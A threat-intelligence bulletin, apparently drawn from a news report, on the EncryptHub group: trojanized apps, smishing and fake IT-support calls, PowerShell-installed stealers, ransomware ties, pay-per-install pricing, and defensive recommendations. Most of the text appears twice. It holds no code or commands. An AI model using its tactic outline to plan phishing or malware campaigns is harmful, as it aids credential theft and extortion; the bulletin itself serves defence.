EncryptHub Deploys Ransomware and Stealer via Trojanized Apps, PPI Services, and Phishing
Summary:
EncryptHub, a financially motivated threat actor, has been conducting sophisticated phishing campaigns to distribute information stealers and ransomware while also developing a new tool called EncryptRAT. First identified in June 2024, EncryptHub employs a multi-pronged approach, including trojanized software distribution, social engineering, and the use of third-party Pay-Per-Install services to maximize the reach of its malware. The group is also tracked by Swiss cybersecurity firm PRODAFT as LARVA-208 and has been linked to the RansomHub and Blacksuit ransomware operations
EncryptHub primarily targets users of widely used applications by distributing trojanized versions through deceptive phishing campaigns. Once installed, these applications trigger multi-stage infections that facilitate the deployment of secondary payloads such as Kematian Stealer, designed for cookie theft and credential harvesting. The group also relies on smishing and vishing attacks to compromise victims. Targets receive phishing SMS messages or are contacted via fraudulent IT support calls, where they are directed to enter their credentials on fake websites under the pretext of resolving technical issues. Often, the group impersonates IT departments or helpdesk teams to gain trust. If the phishing attack is conducted through SMS, victims are typically lured with fake Microsoft Teams links designed to harvest login credentials. The stolen credentials are then used to infiltrate organizations' networks, allowing the deployment of malware and, in many cases, ransomware.
Once a target is compromised, EncryptHub executes PowerShell scripts to install stealer malware such as Fickle, StealC, and Rhadamanthys. These information stealers harvest sensitive data, including credentials, browser cookies, and session tokens, which can be exploited for further attacks or sold on underground forums. In many cases, the end goal is to deploy ransomware, forcing victims to pay a ransom for data decryption. EncryptHub’s ransomware activities are closely tied to RansomHub and Blacksuit, indicating potential collaboration or affiliation with these ransomware-as-a-service (RaaS) groups. The group's ability to infiltrate high-value organizations using advanced social engineering techniques makes them a significant cybersecurity threat.
Security Officer Comments:
A crucial component of EncryptHub’s malware distribution strategy has been its reliance on third-party PPI services, particularly LabInstalls, which facilitates bulk malware installations. LabInstalls offers packages starting at $10 for 100 installations and up to $450 for 10,000 installations, enabling EncryptHub to expand its reach significantly. EncryptHub was observed confirming its use of LabInstalls by leaving positive feedback on the Russian-speaking underground forum XSS, even sharing a screenshot as proof. This reliance on PPI services streamlines their malware distribution efforts, allowing them to target a broader range of victims with minimal effort.
Suggested Corrections:
The rapid evolution of EncryptHub’s tactics underscores the critical need for continuous monitoring and proactive security measures to mitigate the threat posed by the group. Organizations should adopt multi-layered security strategies, including:
https://thehackernews.com/2025/03/encrypthub-deploys-ransomware-and.html
EncryptHub, a financially motivated threat actor, has been conducting sophisticated phishing campaigns to distribute information stealers and ransomware while also developing a new tool called EncryptRAT. First identified in June 2024, EncryptHub employs a multi-pronged approach, including trojanized software distribution, social engineering, and the use of third-party Pay-Per-Install services to maximize the reach of its malware. The group is also tracked by Swiss cybersecurity firm PRODAFT as LARVA-208 and has been linked to the RansomHub and Blacksuit ransomware operations
EncryptHub primarily targets users of widely used applications by distributing trojanized versions through deceptive phishing campaigns. Once installed, these applications trigger multi-stage infections that facilitate the deployment of secondary payloads such as Kematian Stealer, designed for cookie theft and credential harvesting. The group also relies on smishing and vishing attacks to compromise victims. Targets receive phishing SMS messages or are contacted via fraudulent IT support calls, where they are directed to enter their credentials on fake websites under the pretext of resolving technical issues. Often, the group impersonates IT departments or helpdesk teams to gain trust. If the phishing attack is conducted through SMS, victims are typically lured with fake Microsoft Teams links designed to harvest login credentials. The stolen credentials are then used to infiltrate organizations' networks, allowing the deployment of malware and, in many cases, ransomware.
Once a target is compromised, EncryptHub executes PowerShell scripts to install stealer malware such as Fickle, StealC, and Rhadamanthys. These information stealers harvest sensitive data, including credentials, browser cookies, and session tokens, which can be exploited for further attacks or sold on underground forums. In many cases, the end goal is to deploy ransomware, forcing victims to pay a ransom for data decryption. EncryptHub’s ransomware activities are closely tied to RansomHub and Blacksuit, indicating potential collaboration or affiliation with these ransomware-as-a-service (RaaS) groups. The group's ability to infiltrate high-value organizations using advanced social engineering techniques makes them a significant cybersecurity threat.
Security Officer Comments:
A crucial component of EncryptHub’s malware distribution strategy has been its reliance on third-party PPI services, particularly LabInstalls, which facilitates bulk malware installations. LabInstalls offers packages starting at $10 for 100 installations and up to $450 for 10,000 installations, enabling EncryptHub to expand its reach significantly. EncryptHub was observed confirming its use of LabInstalls by leaving positive feedback on the Russian-speaking underground forum XSS, even sharing a screenshot as proof. This reliance on PPI services streamlines their malware distribution efforts, allowing them to target a broader range of victims with minimal effort.
Suggested Corrections:
The rapid evolution of EncryptHub’s tactics underscores the critical need for continuous monitoring and proactive security measures to mitigate the threat posed by the group. Organizations should adopt multi-layered security strategies, including:
- Employee training to recognize phishing and social engineering attempts.
- Enforcing Multi-Factor Authentication (MFA) to prevent credential-based attacks.
- Regular security patches and updates to mitigate vulnerabilities exploited by threat actors.
- Blocking access to known malicious hosting providers, such as Yalishand, to prevent phishing site access.
- Implementing endpoint detection and response (EDR) solutions to identify suspicious activities like PowerShell-based malware execution.
https://thehackernews.com/2025/03/encrypthub-deploys-ransomware-and.html